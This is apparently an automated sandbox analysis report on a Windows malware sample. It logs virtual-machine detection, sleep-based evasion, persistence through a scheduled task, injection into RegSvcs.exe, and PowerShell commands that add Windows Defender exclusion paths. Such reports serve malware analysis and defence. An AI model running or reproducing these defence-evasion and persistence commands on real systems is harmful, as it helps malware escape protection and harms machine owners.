Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: A2h6QhZIKx.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lpIWQr.exe PID: 2372, type: MEMORYSTR

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Memory allocated: 2450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Memory allocated: 2660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Memory allocated: 4660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Memory allocated: 5E30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Memory allocated: 6E30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Memory allocated: 6F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Memory allocated: 7F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Memory allocated: E70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Memory allocated: 2720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Memory allocated: 24F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Memory allocated: 5D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Memory allocated: 6D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Memory allocated: 6EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Memory allocated: 7EA0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5860			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6381			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Evaded block: after key decision

graph_7-18248

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4372	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5220	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7136	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6156	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5520	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041303C FindFirstFileW,FindNextFileW,FindClose,	7_2_0041303C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,	7_2_004111C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00414408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00414408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041158C FindFirstFileW,FindNextFileW,FindClose,	7_2_0041158C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00411590 FindFirstFileW,FindNextFileW,FindClose,	7_2_00411590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D9C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_00416740 GetSystemInfo,

7_2_00416740

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Amcache.hve.10.dr	Binary or memory string: VMware
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.10.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegSvcs.exe, 00000007.00000002.889948878.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.889948878.00000000015C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2083530793.000002B249C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2084959007.000002B24F254000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.10.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.10.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.10.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.10.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.10.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.10.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.10.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.10.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.10.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

7_2_00417B1A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_00407A34 mov eax, dword ptr fs:[00000030h]

7_2_00407A34

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A2h6QhZIKx.exe"
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lpIWQr.exe"
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A2h6QhZIKx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lpIWQr.exe"	Jump to behavior

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A2h6QhZIKx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lpIWQr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lpIWQr" /XML "C:\Users\user\AppData\Local\Temp\tmp263E.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

7_2_00404B4C

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Queries volume information: C:\Users\user\Desktop\A2h6QhZIKx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
